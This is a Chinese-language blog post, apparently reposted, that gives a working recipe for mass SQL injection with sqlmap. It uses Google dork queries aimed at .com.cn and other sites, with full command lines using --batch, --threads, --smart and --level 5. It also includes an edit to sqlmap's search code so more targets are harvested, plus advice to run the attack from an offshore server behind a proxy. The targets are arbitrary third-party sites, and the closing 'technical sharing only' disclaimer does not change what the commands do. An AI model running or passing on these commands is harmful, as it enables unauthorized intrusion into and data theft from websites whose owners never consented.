神兵利器之批量注入SQLMAP


說到批量滲透注入肯定大家都是非常感興趣的,對比了很多工具個人感覺都沒有sqlmap用得順手

本次滲透只需要兩個東西

1.一台香港的服務器

2.sqlmap

因為sqlmap自帶谷歌語法搜索引擎這里就比較香香,只需要配置一下sqlmap,睡一覺就好了,坐等結果

長護短說介紹一下如何使用sqlmap進行批量滲透

sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart

-g                  #谷歌搜索

–proxy          #代理   (掛了ss就直接代理本地)

–threads       #線程

–batch          #自動回復

–answer “extending=N,follow=N,keep=N,exploit=n”           #這個可以對一些特定的問題作出回答,在自動化注入中用

–smart          #當有大量目標時,這個就只檢查基於錯誤的注入點

 

sqlmap 默認測試谷歌前100頁,增加頁面修改  sqlmap\lib\utils\search.py 中的第63行代碼

url = “https://www.google.com/search?”
url += “q=%s&” % urlencode(dork, convall=True)
url += “num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search”
url += “&start=%d” % ((gpage – 1) * 100)

注釋:

q:搜索關鍵詞
num:搜索頁面,默認為10,貌似最大是100,改為1000試試看
hl:默認問英文en,改為中文則是zh-CN,排除國外的網站
complete:全部結果

safe:是否開啟安全過濾
filter:是否過濾重復結果
btnG:正常搜索提交
start:開始頁面

修改 num 值為 1000

我個人比較喜歡這樣搞嘻嘻

python sqlmap.py -g ”inurl:index.php?id=1“ --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --level 5

再次聲明,只是技術分享,用於違法與作者無關

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM